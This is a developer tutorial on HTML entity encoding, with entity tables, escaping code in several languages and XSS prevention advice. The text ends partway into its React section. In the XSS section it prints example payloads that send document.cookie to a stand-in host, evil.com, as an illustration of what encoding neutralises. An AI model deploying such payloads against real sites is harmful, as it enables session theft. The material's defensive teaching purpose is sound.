
HTML Entity Encoder Online: A Complete Guide to HTML Special Characters

11 min read, by DevToolBox

TL;DR

HTML entities convert special characters (like &, <, >, ") into browser-safe representations. Always encode & as &amp; and < as &lt; in HTML. Use named entities for readability and numeric entities for any Unicode character. Proper encoding is the primary defense against XSS attacks. Modern UTF-8 pages can embed most characters directly, but the five HTML-special characters still require encoding. Try our free HTML Entity Encoder/Decoder →

Key Takeaways

  • Always encode &, <, >, ", and ' when inserting user data into HTML.
  • Named entities (&copy;) are readable; numeric entities (&#169; or &#xA9;) work for any Unicode character.
  • HTML entity encoding is different from URL percent-encoding — they serve different contexts.
  • Server-side frameworks auto-escape HTML in templates, but raw innerHTML assignments in JavaScript do not.
  • XSS attacks exploit unencoded HTML insertion; entity-encoding user input neutralizes them.
  • Modern UTF-8 documents can use accented letters and emoji directly — only the 5 HTML-special characters need encoding.
  • &nbsp; (non-breaking space) should be used for semantic line-break prevention, not for visual spacing.

What Are HTML Entities?

An HTML entity is a special text sequence used in HTML documents to represent characters that either have a reserved meaning in HTML syntax or cannot be typed directly on a standard keyboard. Every entity begins with an ampersand (&) and ends with a semicolon (;).

HTML entities were introduced because early HTML documents were commonly limited to ASCII or a single legacy 8-bit encoding, yet authors needed a way to include accented letters, currency signs, mathematical symbols, and special punctuation. Today, HTML5 documents nearly universally declare UTF-8 encoding, which means most characters can be embedded directly. However, the five characters with special HTML significance must still be encoded as entities:

| Character | Entity | Name |
| --- | --- | --- |
| & | &amp; | Ampersand |
| < | &lt; | Less-than |
| > | &gt; | Greater-than |
| " | &quot; | Double quote |
| ' | &apos; | Apostrophe |

There are two types of HTML entities:

  • Named entities — use a descriptive name enclosed in & and ;. Example: &copy; renders as ©. Only predefined characters have named entities.
  • Numeric entities — use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;) form. Works for every Unicode character.
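
The equivalence of the three forms can be checked with a short Python sketch. It relies only on the standard-library `html` module; the helper name `numeric_references` is made up for this illustration.

```python
import html

# Three spellings of the same character: named, decimal, and hexadecimal.
references = ["&copy;", "&#169;", "&#xA9;"]

# html.unescape() resolves every form to the same Unicode character.
decoded = [html.unescape(ref) for ref in references]
print(decoded)


def numeric_references(char: str) -> tuple:
    """Build the decimal and hexadecimal references for one character."""
    code_point = ord(char)
    return f"&#{code_point};", f"&#x{code_point:X};"


print(numeric_references("€"))
```

Because numeric references are derived directly from the code point, this approach works even for characters that have no named entity.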

Encode or decode HTML entities instantly with our free online tool →

Essential HTML Entities Reference Table

The table below covers the most important HTML entities across several categories: security-critical characters, typography, currency, math, Greek letters, arrows, and accented Latin characters. All modern browsers support these entities.

| Character | Named Entity | Numeric Entity | Description / Use Case |
| --- | --- | --- | --- |
| & | &amp; | &#38; | Ampersand: must always be encoded in HTML |
| < | &lt; | &#60; | Less-than sign: opens an HTML tag |
| > | &gt; | &#62; | Greater-than sign: closes an HTML tag |
| " | &quot; | &#34; | Double quote: required in attribute values |
| ' | &apos; | &#39; | Single quote / apostrophe: use in attribute values |
| / | &sol; | &#47; | Solidus (forward slash) |
| ` | &grave; | &#96; | Backtick / grave accent |
| (non-break) | &nbsp; | &#160; | Non-breaking space: prevents line wrap |
| © | &copy; | &#169; | Copyright symbol |
| ® | &reg; | &#174; | Registered trademark symbol |
| ™ | &trade; | &#8482; | Trademark (unregistered) |
| € | &euro; | &#8364; | Euro currency sign |
| £ | &pound; | &#163; | Pound sterling |
| ¥ | &yen; | &#165; | Japanese yen |
| ¢ | &cent; | &#162; | Cent sign |
| – | &ndash; | &#8211; | En dash: used for ranges (2010–2020) |
| — | &mdash; | &#8212; | Em dash: used as a sentence break |
| ‘ | &lsquo; | &#8216; | Left single quotation mark |
| ’ | &rsquo; | &#8217; | Right single quotation mark (also apostrophe) |
| “ | &ldquo; | &#8220; | Left double quotation mark |
| ” | &rdquo; | &#8221; | Right double quotation mark |
| … | &hellip; | &#8230; | Horizontal ellipsis (three dots) |
| · | &middot; | &#183; | Middle dot / interpunct |
| ° | &deg; | &#176; | Degree sign |
| ± | &plusmn; | &#177; | Plus-minus sign |
| × | &times; | &#215; | Multiplication sign |
| ÷ | &divide; | &#247; | Division sign |
| ≠ | &ne; | &#8800; | Not equal to |
| ≤ | &le; | &#8804; | Less-than or equal to |
| ≥ | &ge; | &#8805; | Greater-than or equal to |
| ∞ | &infin; | &#8734; | Infinity symbol |
| ∅ | &empty; | &#8709; | Empty set |
| α | &alpha; | &#945; | Greek letter alpha |
| β | &beta; | &#946; | Greek letter beta |
| γ | &gamma; | &#947; | Greek letter gamma |
| π | &pi; | &#960; | Greek letter pi |
| σ | &sigma; | &#963; | Greek letter sigma |
| Ω | &Omega; | &#937; | Greek capital letter omega |
| → | &rarr; | &#8594; | Rightwards arrow |
| ← | &larr; | &#8592; | Leftwards arrow |
| ↑ | &uarr; | &#8593; | Upwards arrow |
| ↓ | &darr; | &#8595; | Downwards arrow |
| ♥ | &hearts; | &#9829; | Black heart suit |
| ♠ | &spades; | &#9824; | Black spade suit |
| ♦ | &diams; | &#9830; | Black diamond suit |
| ♣ | &clubs; | &#9827; | Black club suit |
| é | &eacute; | &#233; | Latin small e with acute |
| à | &agrave; | &#224; | Latin small a with grave |
| ü | &uuml; | &#252; | Latin small u with diaeresis |
| ñ | &ntilde; | &#241; | Latin small n with tilde (Spanish) |
| ç | &ccedil; | &#231; | Latin small c with cedilla |

Named Entities vs Numeric Entities

HTML entities come in two syntactic forms, each with distinct trade-offs. Understanding when to use each form is key to writing maintainable, portable HTML.

Named Entities

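Named entities use human-readable mnemonic names. The HTML specification defines over 2,000 named character references. They are case-sensitive: &eacute; (é) and &Eacute; (É) are different characters, and &Lt; (≪) is not the same as &lt; (<). Only a handful of legacy uppercase forms such as &LT; and &AMP; are defined as aliases, so do not assume an arbitrary change of case will work.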

    <!-- Named entities: readable and self-documenting -->
    <p>Copyright &copy; 2025 DevToolBox &mdash; All rights reserved.</p>
    <p>Price: &pound;49.99 or &euro;59.99</p>
    <p>Evaluate: x &le; y &ne; z</p>
    <p>Reaction: I &hearts; JavaScript</p>

Named entities are the best choice when: the entity is frequently used and recognizable, you want your HTML source to be readable without constant reference to code charts, and you are targeting modern browsers (all of them support the HTML5 named character references).
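
One way to check whether a name is actually defined, and to see the effect of case, is to look it up in Python's `html.entities.html5` table, which mirrors the HTML named character reference list. This is only a sketch; the `lookup` helper is a hypothetical name.

```python
from html.entities import html5
from typing import Optional


def lookup(name: str) -> Optional[str]:
    """Return the character(s) for a named reference such as 'copy', or None."""
    # Keys in the html5 table include the trailing semicolon.
    return html5.get(f"{name};")


print(lookup("eacute"), lookup("Eacute"))  # two different letters
print(lookup("lt"), lookup("Lt"))          # two different symbols
print(lookup("notarealname"))              # undefined names return None
```

A lookup like this can be handy in a build step that validates hand-written entities before publishing.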

Numeric Entities — Decimal

Decimal numeric entities use the Unicode code point in base 10. Format: &#[decimal];. They work for any Unicode character, even those without named entities.

    <!-- Decimal numeric entities -->
    <p>Copyright &#169; 2025</p>       <!-- same as &copy; -->
    <p>Trademark &#8482;</p>           <!-- &trade; -->
    <p>Snowman: &#9731;</p>            <!-- no named entity! -->
    <p>Musical note: &#9835;</p>       <!-- no named entity! -->
    <p>Emoji-like: &#128512;</p>       <!-- U+1F600 grinning face -->

Numeric Entities — Hexadecimal

Hexadecimal numeric entities use the code point in base 16. Format: &#x[hex];. Developers who work with Unicode charts often prefer hex because Unicode values are typically specified in hex (U+00A9, U+20AC, etc.).

    <!-- Hexadecimal numeric entities map directly to Unicode code points -->
    <p>Copyright &#xA9; 2025</p>             <!-- U+00A9 -->
    <p>Euro sign: &#x20AC;</p>               <!-- U+20AC -->
    <p>Em dash &#x2014; separates ideas</p>  <!-- U+2014 -->
    <p>Right arrow: &#x2192;</p>             <!-- U+2192 -->
    <p>Snowflake: &#x2746;</p>               <!-- U+2746 -->
Tip: In modern UTF-8 HTML5 documents, you can use Unicode characters directly without entities (e.g., type © instead of &copy;). Entities are still required for the 5 HTML-special characters and are useful when your text editor cannot handle certain character sets or when generating HTML programmatically.

When to Encode vs When Not To

Knowing exactly when HTML entity encoding is mandatory, when it is recommended, and when it is unnecessary helps you write secure, correct HTML without over-encoding.

Always Encode (Required)

These five characters must be encoded in the contexts noted:
  • & → &amp;: in text content and in attribute values
  • < → &lt;: in text content (otherwise it opens a tag)
  • > → &gt;: in text content (recommended; strictly required only in XML/XHTML when it follows ]])
  • " → &quot;: inside attribute values delimited by double quotes
  • ' → &apos; or &#39;: inside attribute values delimited by single quotes
    <!-- WRONG: unencoded ampersand breaks HTML parsing -->
    <a href="https://example.com?foo=1&bar=2">Link</a>

    <!-- CORRECT: encode the ampersand -->
    <a href="https://example.com?foo=1&amp;bar=2">Link</a>

    <!-- WRONG: unencoded < in text creates a broken tag -->
    <p>if a < b then c > d</p>

    <!-- CORRECT: encode angle brackets -->
    <p>if a &lt; b then c &gt; d</p>

    <!-- WRONG: unescaped quote terminates attribute early -->
    <input value="Say "hello" to me">

    <!-- CORRECT: encode the inner double quotes -->
    <input value="Say &quot;hello&quot; to me">

    <!-- ALTERNATIVE: use single quotes for the attribute -->
    <input value='Say "hello" to me'>

Encode When Generating HTML Dynamically

Any time user-supplied text, database content, or external data is inserted into an HTML document — whether via server-side templates or client-side DOM manipulation — special characters must be entity-encoded before insertion. This is the primary XSS prevention mechanism.

    <!-- If userInput = '<img src=x onerror=alert(1)>' -->
    <!-- (a <script> tag inserted via innerHTML does not run, but event-handler attributes do) -->

    <!-- DANGEROUS: raw innerHTML injection -->
    <div id="output"></div>
    <script>
      document.getElementById('output').innerHTML = userInput; // XSS!
    </script>

    <!-- SAFE: use textContent, which does NOT parse HTML -->
    <script>
      document.getElementById('output').textContent = userInput; // safe
    </script>

    <!-- SAFE: encode before inserting as innerHTML -->
    <script>
      function encodeHtml(str) {
        return str
          .replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
      }
      document.getElementById('output').innerHTML = encodeHtml(userInput);
    </script>

When Encoding Is Optional (UTF-8 Documents)

In modern HTML5 documents with <meta charset="UTF-8">, you can embed accented letters, currency signs, emoji, and most Unicode characters directly in your source. Using &eacute; for é or &euro; for € is optional — the literal characters are equally valid. Encoding everything is unnecessary noise.

    <!-- HTML5 UTF-8 document: these are equivalent -->
    <p>Caf&eacute; au lait costs &euro;3.50</p>
    <p>Café au lait costs €3.50</p>
    <!-- Both render identically in all modern browsers -->
    <!-- The second form is preferred in UTF-8 source files -->

Context-Specific Encoding Rules

| HTML Context | Characters to Encode | Example |
| --- | --- | --- |
| Text content (between tags) | & < > | <p>Tom &amp; Jerry &lt;3</p> |
| Double-quoted attribute | & < " (> optional) | <a href="x?a=1&amp;b=2"> |
| Single-quoted attribute | & < ' (> optional) | <img alt='Tom &amp; Jerry'> |
| Unquoted attribute | & < > " ' space tab | (avoid unquoted attributes) |
| style attribute (CSS in HTML) | & < " in CSS strings | <div style="content: &quot;x&quot;"> |
| JavaScript string in event handler | & < > " ' (after JavaScript string escaping) | <div onclick="fn(&quot;x&quot;)"> |
| URL in href/src | Percent-encode URL; then entity-encode & in HTML | <a href="/?q=a%20b&amp;page=1"> |
| CDATA sections | ]]> must be avoided | (XML/XHTML specific) |
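
The first three rows of the table can be sketched in Python with the standard-library `html.escape()` function. The wrapper names `escape_text` and `escape_attr` are assumptions made for this example, not part of any library.

```python
import html


def escape_text(value: str) -> str:
    """For text between tags: encode & < > only."""
    return html.escape(value, quote=False)


def escape_attr(value: str) -> str:
    """For quoted attribute values: also encode double and single quotes."""
    return html.escape(value, quote=True)


name = 'Tom & "Jerry" <3'
print(f"<p>{escape_text(name)}</p>")
print(f'<input value="{escape_attr(name)}">')
```

Using the attribute-safe variant everywhere is a reasonable default, since over-encoding quotes in text content is harmless.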

HTML Entity Encoding vs URL Encoding

Developers often confuse HTML entity encoding and URL percent-encoding because both deal with special characters and often appear together. They are fundamentally different mechanisms for different purposes:

| Property | HTML Entity Encoding | URL Percent Encoding |
| --- | --- | --- |
| Format | &name; or &#code; | %XX (hex byte) |
| Context | HTML documents and templates | URLs, query strings, form data |
| Standard | HTML Standard (named character references) | RFC 3986 |
| Example: space | &#32; (rarely needed; &nbsp; is a different, non-breaking character) | %20 or + (in form data) |
| Example: & | &amp; | %26 |
| Example: < | &lt; | %3C |
| Example: © | &copy; or &#169; | %C2%A9 (UTF-8 bytes) |
| Example: € | &euro; or &#8364; | %E2%82%AC (UTF-8 bytes) |

A common scenario requires both types of encoding. When embedding a URL in an HTML attribute, the URL itself may contain percent-encoded characters, and the HTML attribute may also require HTML entity encoding of the ampersand in query strings:

    <!-- URL with query parameters in an HTML attribute -->
    <!-- Step 1: URL encode the query values -->
    <!--   "hello world" -> "hello%20world" -->
    <!-- Step 2: HTML entity encode the & separating parameters -->

    <!-- WRONG: bare & breaks HTML validation -->
    <a href="https://example.com/search?q=hello%20world&lang=en">Search</a>

    <!-- CORRECT: & in an HTML attribute must be &amp; -->
    <a href="https://example.com/search?q=hello%20world&amp;lang=en">Search</a>

    <!-- Note: URL path characters ARE percent-encoded; the HTML attribute & IS entity-encoded -->
    <!-- They are two separate encoding layers applied in their respective contexts -->
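
The two layers can be applied in order with Python's standard library. This is a minimal sketch; the function name `build_link` and its parameters are invented for illustration.

```python
import html
from urllib.parse import quote, urlencode


def build_link(base_url: str, params: dict, label: str) -> str:
    # Layer 1: percent-encode the query values (quote_via=quote yields %20, not +).
    query = urlencode(params, quote_via=quote)
    url = f"{base_url}?{query}"
    # Layer 2: entity-encode the finished URL for the attribute and the label for text.
    href = html.escape(url, quote=True)
    return f'<a href="{href}">{html.escape(label, quote=False)}</a>'


link = build_link("https://example.com/search", {"q": "hello world", "lang": "en"}, "Search")
print(link)
```

The order matters: percent-encoding first and entity-encoding last matches the order in which the browser undoes them (HTML parsing first, then URL parsing).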

Use our URL Encoder tool for percent-encoding and our HTML Entity Encoder tool for HTML entity encoding — they address different encoding needs.

HTML Entity Encoding in JavaScript

JavaScript does not have a built-in HTML escape function, but there are several correct and idiomatic approaches. Choosing the right API matters for both security and correctness.

The Correct Way: textContent and DOM APIs

The safest and most straightforward method is to use the DOM APIs that automatically handle encoding for you:

    // --- Safe: textContent sets plain text, no HTML parsing ---
    const div = document.createElement('div');
    div.textContent = '<script>alert("xss")</script>';
    console.log(div.innerHTML);
    // Output: &lt;script&gt;alert("xss")&lt;/script&gt;

    // --- Safe: createTextNode for dynamic content ---
    const textNode = document.createTextNode('Tom & Jerry <3');
    document.body.appendChild(textNode);
    // Renders as: Tom & Jerry <3 (no HTML interpretation)

    // --- Safe: setAttribute for setting attribute values ---
    const a = document.createElement('a');
    a.setAttribute('title', 'Tom & Jerry <fansite>');
    // Attribute is set correctly; browser handles the encoding internally

Manual Encoding Function (When innerHTML Is Required)

When you need to construct HTML strings (e.g., to set innerHTML with mixed text and markup), create a reliable encode function:

    /**
     * Encode HTML special characters to prevent XSS.
     * Only encodes the 5 characters that have HTML significance.
     */
    function encodeHtml(str: string): string {
      return String(str)
        .replace(/&/g, '&amp;')   // Must be FIRST, otherwise &lt; becomes &amp;lt;
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');  // Use &#39; for broader compatibility than &apos;
    }

    /**
     * Decode HTML entities back to plain text.
     */
    function decodeHtml(html: string): string {
      const txt = document.createElement('textarea');
      txt.innerHTML = html;
      return txt.value;
    }

    // Usage examples:
    encodeHtml('<script>alert("xss")</script>');
    // => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

    encodeHtml("Tom & Jerry's adventure");
    // => 'Tom &amp; Jerry&#39;s adventure'

    decodeHtml('&lt;strong&gt;Hello &amp; World&lt;/strong&gt;');
    // => '<strong>Hello & World</strong>'

Using DOMParser for Safe HTML Parsing

    // DOMParser: parse HTML safely and extract text
    function htmlToText(html: string): string {
      const doc = new DOMParser().parseFromString(html, 'text/html');
      return doc.body.textContent ?? '';
    }

    htmlToText('<b>Hello</b> &amp; <i>World</i>');
    // => 'Hello & World'

    // Alternative with template literals and tagged templates
    function safeHtml(strings: TemplateStringsArray, ...values: unknown[]): string {
      return strings.reduce((result, str, i) => {
        const value = values[i - 1];
        return result + encodeHtml(String(value ?? '')) + str;
      });
    }

    const username = '<script>alert(1)</script>';
    const greeting = safeHtml`<p>Welcome, ${username}!</p>`;
    // => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

Libraries for HTML Encoding in JavaScript

| Library | Function | Notes |
| --- | --- | --- |
| he | he.encode() / he.decode() | Full HTML entity encoder/decoder; supports all named + numeric entities |
| entities | encodeHTML() / decodeHTML() | Lightweight; supports HTML4, HTML5, and XML entities |
| DOMPurify | DOMPurify.sanitize() | Full XSS sanitizer; strips dangerous tags/attributes, not just encoding |
| escape-html | escapeHtml(str) | Minimal 5-character encoder for security; no decoding |
| xss | xss(str) | Configurable whitelist-based XSS filter |
    // Using the 'he' library (npm install he)
    import he from 'he';

    // he.escape() encodes only the markup-significant characters
    he.escape('Tom & Jerry <fansite>');
    // => 'Tom &amp; Jerry &lt;fansite&gt;'

    // he.encode() also encodes non-ASCII characters; without
    // useNamedReferences it emits hexadecimal numeric references
    he.encode('Café ©', { useNamedReferences: true });
    // => 'Caf&eacute; &copy;'

    he.decode('&lt;p&gt;Hello &amp; World&lt;/p&gt;');
    // => '<p>Hello & World</p>'

    // Using 'escape-html' (minimal, security-focused)
    import escapeHtml from 'escape-html';

    escapeHtml('<script>alert(1)</script>');
    // => '&lt;script&gt;alert(1)&lt;/script&gt;'

HTML Entity Encoding in Python

Python ships with robust HTML encoding utilities in its standard library, making third-party dependencies unnecessary for basic use cases.

html.escape() and html.unescape()

    import html

    # html.escape() encodes the 5 HTML-special characters
    html.escape('<script>alert("xss")</script>')
    # => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

    html.escape('Tom & Jerry')
    # => 'Tom &amp; Jerry'

    # By default, quotes ARE encoded (quote=True is the default)
    html.escape('"Hello World"')
    # => '&quot;Hello World&quot;'

    # Set quote=False to skip quote encoding (only safe for text content, not attributes!)
    html.escape('"Hello"', quote=False)
    # => '"Hello"'

    # html.unescape() decodes named and numeric entities
    html.unescape('&lt;p&gt;Hello &amp; World&lt;/p&gt;')
    # => '<p>Hello & World</p>'

    html.unescape('Caf&eacute; &copy; 2025 &mdash; All rights reserved.')
    # => 'Café © 2025 — All rights reserved.'

    html.unescape('&#169; &#x20AC; &#9829;')
    # => '© € ♥'

Python HTML Entity Encoding in Web Frameworks

    # Django templates auto-escape by default
    # {{ variable }} is HTML-escaped automatically
    # Use {{ variable|safe }} only when you trust the content completely
    from django.utils.html import escape, format_html
    from django.utils.safestring import mark_safe  # documented home of mark_safe

    user_input = '<script>alert(1)</script>'
    safe_html = escape(user_input)
    # => '&lt;script&gt;alert(1)&lt;/script&gt;'

    # format_html safely combines trusted HTML and escaped values
    message = format_html('<p>Welcome, {}!</p>', user_input)
    # => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

    # Flask/Jinja2 auto-escapes in templates by default
    from markupsafe import escape as jinja_escape, Markup

    safe = jinja_escape('<b>Unsafe user input</b>')
    print(safe)        # => &lt;b&gt;Unsafe user input&lt;/b&gt;
    print(type(safe))  # => <class 'markupsafe.Markup'>

    # Build safe HTML from trusted + untrusted parts
    trusted_html = Markup('<p>Hello, {}!</p>').format('<script>xss</script>')
    # => '<p>Hello, &lt;script&gt;xss&lt;/script&gt;!</p>'

Encoding All Named Entities in Python

    # For full named entity encoding (e.g., © -> &copy;), use html.entities
    import html  # needed for html.escape() below
    from html.entities import codepoint2name

    def encode_full_html(text: str, named: bool = True) -> str:
        """Encode all non-ASCII chars as named or numeric HTML entities."""
        result = []
        for char in html.escape(text):
            code = ord(char)
            if code > 127:
                name = codepoint2name.get(code)
                if named and name:
                    result.append(f'&{name};')
                else:
                    result.append(f'&#{code};')
            else:
                result.append(char)
        return ''.join(result)

    encode_full_html('Café © 2025 — Cost: €49')
    # => 'Caf&eacute; &copy; 2025 &mdash; Cost: &euro;49'

    encode_full_html('Café © 2025', named=False)
    # => 'Caf&#233; &#169; 2025'

HTML Entity Encoding in PHP

PHP provides two main functions for HTML encoding, each with important differences that affect security and character coverage.

htmlspecialchars() vs htmlentities()

    <?php
    // htmlspecialchars() encodes only the 5 HTML-special characters
    // This is the RECOMMENDED function for XSS prevention
    $user_input = '<script>alert("XSS")</script>';
    echo htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // => &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;

    // Always pass ENT_QUOTES to encode both single and double quotes
    // (before PHP 8.1 the default flags left single quotes unencoded)
    // Pass 'UTF-8' explicitly so the result does not depend on the default_charset setting

    // htmlentities() encodes ALL characters with HTML entity equivalents
    // More aggressive than needed for UTF-8 documents; can cause issues
    $text = 'Café © 2025 costs €49';
    echo htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // => Caf&eacute; &copy; 2025 costs &euro;49

    // htmlspecialchars_decode() decodes back the 5 special chars only
    $encoded = '&lt;b&gt;Hello &amp; World&lt;/b&gt;';
    echo htmlspecialchars_decode($encoded, ENT_QUOTES);
    // => <b>Hello & World</b>

    // html_entity_decode() decodes ALL HTML entities
    $encoded = 'Caf&eacute; &copy; &euro;49';
    echo html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // => Café © €49

    // strip_tags() removes HTML tags (NOT a security substitute for encoding!)
    $input = '<script>alert(1)</script><b>Bold</b>';
    echo strip_tags($input);
    // => alert(1)Bold (the tags are removed but the text inside them remains; NEVER rely on this for security)
    ?>

PHP Best Practices for HTML Encoding

PHP Security Rule: Always use htmlspecialchars($var, ENT_QUOTES | ENT_HTML5, 'UTF-8') when outputting user data in HTML. Do not rely on strip_tags() alone — it does not prevent XSS in attribute values or event handlers.
    <?php
    // Create a reusable helper function
    function h(string $str): string {
        return htmlspecialchars($str, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }

    // Usage in HTML templates
    ?>
    <div class="user-profile">
      <h1><?= h($user['name']) ?></h1>
      <p class="bio"><?= h($user['bio']) ?></p>
      <a href="<?= h($user['website']) ?>">
        <?= h($user['website_label']) ?>
      </a>
      <input type="text" value="<?= h($user['email']) ?>" placeholder="<?= h($placeholder) ?>">
    </div>

    <?php
    // In Twig templates (Symfony, Craft CMS)
    // {{ variable }}            auto-escaped in Twig (same as h())
    // {{ variable|raw }}        UNSAFE, skips escaping
    // {{ variable|e('html') }}  explicit HTML escaping

    // In Blade templates (Laravel)
    // {{ $variable }}    auto-escaped
    // {!! $variable !!}  UNSAFE raw output
    ?>

HTML Entity Encoding in Ruby

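Ruby on Rails and the CGI module provide standard tools for HTML encoding. Rails renders ERB templates (via the Erubi engine) with auto-escaping enabled by default; other Rack-based frameworks may require you to turn escaping on explicitly or call an escape helper yourself.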

    # Ruby standard library: CGI module
    require 'cgi'

    CGI.escapeHTML('<script>alert("xss")</script>')
    # => "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;"

    CGI.escapeHTML('Tom & Jerry')
    # => "Tom &amp; Jerry"

    CGI.unescapeHTML('&lt;b&gt;Hello&lt;/b&gt; &amp; World &copy;')
    # => "<b>Hello</b> & World &copy;"
    # CGI.unescapeHTML decodes only &amp; &lt; &gt; &quot; &apos; and numeric
    # references; other named entities such as &copy; are left as-is

    # Ruby on Rails ERB templates
    # <%= variable %>   HTML-escaped automatically (calls html_escape / h)
    # <%== variable %> or <%= raw variable %>   UNSAFE raw output

    # Using ERB programmatically
    require 'erb'
    include ERB::Util

    html_escape('<script>alert(1)</script>')
    # => "&lt;script&gt;alert(1)&lt;/script&gt;"

    h('<script>alert(1)</script>')  # h() is an alias for html_escape
    # => "&lt;script&gt;alert(1)&lt;/script&gt;"

    # ActiveSupport (Rails): content_tag for safe HTML generation
    # content_tag(:p, user.name)            # auto-escaped
    # content_tag(:p, user.name.html_safe)  # UNSAFE, use only for trusted content

    # Rack::Utils
    require 'rack/utils'
    Rack::Utils.escape_html('Tom & Jerry <3')
    # => "Tom &amp; Jerry &lt;3"

XSS Prevention with HTML Entity Encoding

Cross-Site Scripting (XSS) is one of the most prevalent web security vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. HTML entity encoding is the primary defense, but it must be applied correctly and in the right context.

Understanding XSS Attack Vectors

XSS Attack Types:
  • Reflected XSS: Malicious script in the URL is reflected back in the response.
  • Stored XSS: Malicious script stored in the database, served to all visitors.
  • DOM-based XSS: Script injected via client-side DOM manipulation without server involvement.
    <!-- Reflected XSS Example -->
    <!-- URL: https://example.com/search?q=<script>document.location='https://evil.com?c='+document.cookie</script> -->

    <!-- VULNERABLE server response -->
    <p>Results for: <script>document.location='https://evil.com?c='+document.cookie</script></p>

    <!-- SAFE server response (after HTML encoding the query parameter) -->
    <p>Results for: &lt;script&gt;document.location=&#39;https://evil.com?c=&#39;+document.cookie&lt;/script&gt;</p>

    <!-- Stored XSS Example: comment stored in database -->
    <!-- Attacker comment: <img src=x onerror="fetch('https://evil.com?'+document.cookie)"> -->

    <!-- VULNERABLE: displaying raw stored content -->
    <div class="comment">[raw comment HTML here]</div>

    <!-- SAFE: HTML-encode before rendering -->
    <div class="comment">&lt;img src=x onerror=&quot;fetch(&#39;https://evil.com?&#39;+document.cookie)&quot;&gt;</div>

Context-Sensitive Escaping — Why One Encoder Is Not Enough

A critical and often misunderstood principle: HTML entity encoding alone is not sufficient for all injection contexts. Different parts of an HTML document require different escaping strategies:

| Context | Required Escaping | Example |
| --- | --- | --- |
| HTML body text | HTML entity encode | <p>{user_input}</p> |
| HTML attribute value | HTML entity encode + quote attribute | <input value="{user_input}"> |
| JavaScript string in script tag | JavaScript string escape (\\, \", \n, etc.) | <script>var x = "{user_input}";</script> |
| CSS value in style tag | CSS escape | <style>color: {user_input};</style> |
| URL in href/src | URL encode, then HTML encode | <a href="{url_encoded_then_html_encoded}"> |
| JSON in HTML | JSON encode + avoid </script> | <script>var data = {json_encoded};</script> |
    // JavaScript context inside <script> tags requires JS string escaping, NOT HTML entities

    // WRONG: HTML encoding in a JS context
    const name = '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;';
    // Inside a <script> element the browser does not decode entities, so the
    // variable holds the literal text "&lt;/script&gt;..." (corrupted data).
    // Inside an event-handler attribute (onclick="...") entities ARE decoded
    // before the JS is parsed, so HTML encoding alone does not stop injection there.

    // CORRECT: JSON encode for JavaScript embedding
    // In a server template (e.g., Node.js with Handlebars):
    const userData = JSON.stringify({ name: userName })
      .replace(/</g, '\\u003c'); // prevents premature </script> closing

    // Better: use a dedicated JSON-in-HTML serializer
    // e.g., serialize-javascript (npm package)
    import serialize from 'serialize-javascript';
    const userDataStr = serialize({ name: userName }, { isJSON: true });

    // CSS injection is also real: never embed user input in CSS without escaping
    // WRONG:
    // <div style="background-image: url({userUrl});">
    // An attacker can use: ); expression(alert(1)); background:(
    // SAFE: Never allow user input in CSS values; use whitelisting or data attributes instead
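
The "JSON in HTML" row can also be handled on a Python server. The sketch below uses only the standard `json` module; `json_for_script` is a hypothetical helper name, and replacing `<`, `>`, and `&` with `\uXXXX` escapes is one common approach rather than the only one.

```python
import json


def json_for_script(data: object) -> str:
    """Serialize data as JSON that can sit inside a <script> element."""
    text = json.dumps(data)
    # Escape characters that could close the script block or open a comment.
    # The \uXXXX forms are still valid JSON and decode to the same characters.
    return (
        text.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


payload = {"name": "</script><script>alert(1)</script>"}
safe = json_for_script(payload)
print(f"<script>var data = {safe};</script>")
```

The escaped output round-trips through any JSON parser unchanged, so the client-side code sees the original string.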

Content Security Policy as Defense in Depth

HTML encoding neutralizes most XSS, but a Content Security Policy (CSP) header provides a second layer of defense that limits what scripts can execute even if encoding fails:

    # HTTP Response Header: strict CSP (sent as a single header line)
    Content-Security-Policy:
      default-src 'self';
      script-src 'self' 'nonce-{random-nonce-per-request}';
      style-src 'self' 'nonce-{random-nonce-per-request}';
      img-src 'self' data: https:;
      font-src 'self';
      object-src 'none';
      base-uri 'self';
      form-action 'self';
      frame-ancestors 'none';

    # With nonces, only scripts with the matching nonce attribute execute:
    <script nonce="rAnd0mNonce123">
      // This script is allowed by CSP
    </script>

    # Any injected <script> without the nonce is blocked by the browser
Defense-in-depth approach:
  1. HTML entity encode all user-supplied data in HTML contexts (primary defense).
  2. Use context-appropriate escaping (JS, CSS, URL) in other contexts.
  3. Implement Content Security Policy headers (secondary defense).
  4. Use HttpOnly cookies to limit cookie theft even if XSS occurs.
  5. Use a well-tested sanitization library (like DOMPurify) for rich text user input.
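
Generating the per-request nonce for step 3 might look like the following Python sketch. The helper name `make_csp_header` and the shortened directive list are assumptions for illustration; a real policy would carry the full set of directives shown earlier.

```python
import secrets


def make_csp_header(nonce: str) -> str:
    """Build a (shortened) Content-Security-Policy value for one response."""
    directives = [
        "default-src 'self'",
        f"script-src 'self' 'nonce-{nonce}'",
        "object-src 'none'",
        "base-uri 'self'",
    ]
    return "; ".join(directives)


# A fresh, unpredictable value must be generated for every response.
nonce = secrets.token_urlsafe(16)
header_value = make_csp_header(nonce)
script_tag = f'<script nonce="{nonce}">/* allowed inline script */</script>'
print(header_value)
print(script_tag)
```

The same nonce value has to appear in both the header and the script tag of a given response, and it should never be reused across responses.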

HTML Entities in React / JSX

React automatically HTML-encodes all string values rendered via JSX expressions. This means you rarely need to manually encode entities in React applications. However, there are specific patterns for using HTML entities in JSX.

React Auto-Escaping

